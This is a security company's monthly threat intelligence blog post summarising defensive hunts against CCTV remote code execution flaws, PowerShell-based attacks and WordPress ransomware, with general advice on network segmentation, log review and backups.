This entry is the monthly continuation of Anitian’s series of threat intelligence insights from our Sherlock Managed Threat Intelligence team. The purpose of these briefings is to publish some of the significant campaigns that our team of Sherlocks are tracking at this time.
Leap year February gave us an extra day of patch notes, CVE releases, and vulnerabilities to sift through. The pace of those releases has increased considerably over the last few months, indicative of both an increase in vulnerabilities but also the explosive growth of platforms with vulnerabilities. Verifiable threats in the Internet of Things (IoT) space has been hibernating for a while. It is fair to say that it, like the groundhog, it has come out of its hole and decided to start grabbing acorns.
Below are some notable hunts our Sherlocks have gathered over the last month.
CCTV RCE WTF?!
WHAT: The big IoT story this month was the the recent notice that CCTV devices contain remote code executions. There is allegations that some of these systems have been used as a beachhead into an payment systems.
WHY: It is tempting to ignore these vulnerabilities since the vendors of these devices have tight control over the firmware. However, that is not a reasonable response. While you can outsource a technology (or task), you cannot outsource responsibility. These IoT vulnerabilities embody a double-edged challenge: On one hand, you must hold technology vendors accountable to their code and patch IoT devices quickly. However, on the other hand, you also must ensure that these vendor-controlled devices do not have any of discretionary access. IoT devices, such as CCTV, have no compelling business reason to have broad network access. This makes network segmentation and core firewalls a vital part of any security program.
Due to the increase in attacks against these IoT devices, our team has been hunting for any unusual network traffic originating from these devices or their networks.
With Great Powershell Comes Great Responsibility
WHAT: Nearly ten years ago, (now I really feel old) Microsoft released Powershell, an extraordinarily potent command line shell for Windows. It has gained slow but steady traction as a tool for doing all manner of administrative work. It has also gained traction among “the bad guys” (and us good guys doing professional bad guy work.) If you want to compromise a Windows box, running Powershell scripts is a most excellent way to do it.
WHY: Powershell enables attackers to do many nasty things with great easy, speed, and efficiency. Some of these are getting patched out of ability with improvements to Windows OSes, but in the meantime the bulk of the world can still fall to tools like Powersploit, Mimikatz and more. Many versions of Powershell leave behind some traces of mischief in Powershell logs.
As such, this month we launched a campaign to scan Powershell logs for evidence of these attacks. Sometimes it is not a compromise we find, but some creative scripting from the system administrators, which has the unfortunate side effect of leaving the system wide open to attack.
WordPress Rampant Ransomware
WHAT: I yearn for month where we do not have to mention the big three: Flash, Java, or WordPress. This is not that month. While the latest GLIBC kerfuffle, or uptick in exploit kit use was interesting, it is possible to ignore a juicy WordPress vulnerability? Certainly not when it comes from ransomware creators. In February the ransomware writers repurposed some old Critroni code to affect WordPress sites to the tune of about $400 each.
WHY: This is a notable trend we have seen lately. Malware creators repurposing existing or longstanding malware in new and destructive ways. While this particular specimen may be relatively low impact (because we all backup our WordPress sites religiously, right?!) Ransomware has become extremely popular in the last few months.
As such, our WordPress hunts have been active this month and will likely remain that way for the foreseeable future. We are also conducting targeted hunts around common ransomware tactics and behaviors.
Chasing threats is never comfortable or easy. The threat landscape is extremely volatile right now. It takes constant vigilance to stay on top of the attackers. That’s what we do at Anitian Sherlock.
As always, we welcome your thoughts and feedback. And check back next month for our April Sherlock report.